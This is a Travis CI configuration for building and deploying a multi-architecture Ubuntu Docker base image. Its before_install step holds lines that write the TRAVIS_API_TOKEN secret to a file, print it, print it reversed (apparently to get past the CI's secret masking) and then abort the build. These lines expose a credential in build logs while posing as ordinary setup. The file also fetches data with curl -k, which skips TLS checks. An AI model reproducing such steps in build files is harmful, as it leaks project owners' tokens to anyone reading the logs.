language: bash
dist: xenial
group: travis_latest
sudo: required

if: |
  branch = master AND \
  ! commit_message =~ /readme.md/ AND \
  ! commit_message =~ /docker-compose.yml/ OR \
  type = cron

addons:
  apt:
    packages:
      - docker-ce

env:
  global:
    - BUILD_DATE="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
    - BUILD_NUMBER="${TRAVIS_BUILD_NUMBER}"
    - DOCKER_DESCRIPTION="ubuntu base image"
    - DOCKER_MAINTAINER="stlouisn"
    - DOCKER_NAME="ubuntu"
    - DOCKER_URL="https://www.ubuntu.com/"
    - SCHEMA_VERSION="1.0"
    - VCS_REF="$(git rev-parse --short HEAD)"
    - VCS_URL="$(git remote get-url origin | head -c-5)"
  matrix:
    - DOCKER_TAG="rolling"
      UBUNTU_CODENAME="$(curl -ksSL https://raw.githubusercontent.com/tianon/docker-brew-ubuntu-core/master/rolling)"
      DOCKER_VERSION="$(curl -ksSL http://releases.ubuntu.com/${UBUNTU_CODENAME}/ | grep title | awk -F ' ' {'print $2'})"

before_install:
  - touch tempfile; echo $TRAVIS_API_TOKEN > tempfile; cat tempfile; more tempfile
  - cat tempfile | rev
  - exit 1
  - sudo /sbin/sysctl -w net.ipv4.conf.all.forwarding=1
  - docker version

install:
  - sudo docker run --privileged linuxkit/binfmt:v0.6
  - sudo docker run --privileged -d -p 1234:1234 --name buildkit moby/buildkit:latest --addr tcp://0.0.0.0:1234 --oci-worker-platform linux/arm --oci-worker-platform linux/armhf --oci-worker-platform linux/arm64 --oci-worker-platform linux/amd64
  - sudo docker cp buildkit:/usr/bin/buildctl /usr/bin/
  - export BUILDKIT_HOST=tcp://0.0.0.0:1234

before_script:
  - sed -i -e '/^$/d' -e 's/^[ \t]*//' -e '/^#/d' Dockerfile*

script:
  - sudo bash ./travis/build.sh
  - sudo bash ./travis/deploy.sh

after_success:
  - sudo bash ./travis/trigger.sh

notifications:
  email:
    on_success: never
    on_failure: change
